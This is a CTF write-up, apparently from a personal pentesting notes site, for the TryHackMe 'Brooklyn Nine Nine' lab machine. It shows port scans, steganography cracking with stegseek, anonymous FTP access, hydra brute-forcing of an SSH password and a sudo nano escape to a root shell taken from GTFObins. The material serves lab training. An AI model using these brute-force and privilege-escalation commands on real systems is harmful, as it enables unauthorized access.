GeorgeBanu
  • About me
  • Pentesting CheatSheets
    • Information Gathering
    • Ports Enumeration
      • FTP-21
      • SSH-22
      • Telnet-23
      • SMTP - 25,465,587
      • DNS-53
      • NetBIOS, SMB - 139,445
      • SNMP-161
      • MySQL-3306
      • RDP-3389
      • WinRM-5985
    • Web Cheat Sheet
    • Privilege Escalation
      • Linux Enumeration
      • Linux Privesc Techniques
    • Tricks
    • Template
  • TryHackMe Writeups
    • Starter
    • Dreaming
    • ColddBox: Easy
    • Ollie
    • Blog
    • KoTH Hackers
    • Brooklyn Nine Nine
    • Chill Hack
    • Undiscovered
    • Archangel
    • Jason
    • GLITCH
    • VulnNet: Node
    • Road
    • VulnNet:Internal
    • W1seGuy
  • CyberEDU Writeups
    • flag-is-hidden
    • file-crawler
    • reccon
    • this-file-hides-something
    • wifiland
    • old-tickets
    • inodat
    • pattern
    • ultra-crawl
  • eJPT
Powered by GitBook
On this page
  • Lab Setup
  • Enumeration
  • Exploitation
  1. TryHackMe Writeups

Brooklyn Nine Nine

PreviousKoTH HackersNextChill Hack

Last updated 1 year ago

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/Brooklyn99
cd ~/Documents/TryHackMe/eJPT/Brooklyn99
mkdir recon enumeration notes
touch/{README.md,vulns,creds}

export IP=10.10.106.147
export URL=http://$IP

Enumeration

First thing that I do when I make a machine I scan for open ports. I do this with nmap and rustscan.

  • rustscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init
  • nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

Look for default page on website. In source code I found an interesting commentary.

<!-- Have you ever heard of steganography? -->

So let’s download the image and use some stegano tools.

stegseek --crack brooklyn99.jpg ~/Documents/rockyou.txt

admin --> password

Keep in mind that the path I used for rockyou database might differ from your path

When I see the 80 port open I usually scan for files and directories, but I didn’t find anything. So let’s connect to FTP server with anonymous default user.

Jake has a weak password so let’s brute force ssh login.

hydra -l jake -P ~/Documents/rockyou.txt ssh://$IP

Now I have 2 users and for each of them one password to connect with ssh.

Exploitation

Connect with ssh and see the user flag in holt home directory.

Search on Gtfobins to see how to exploit this vulnerability.

sudo nano
^R^X
reset; sh 1>&0 2>&0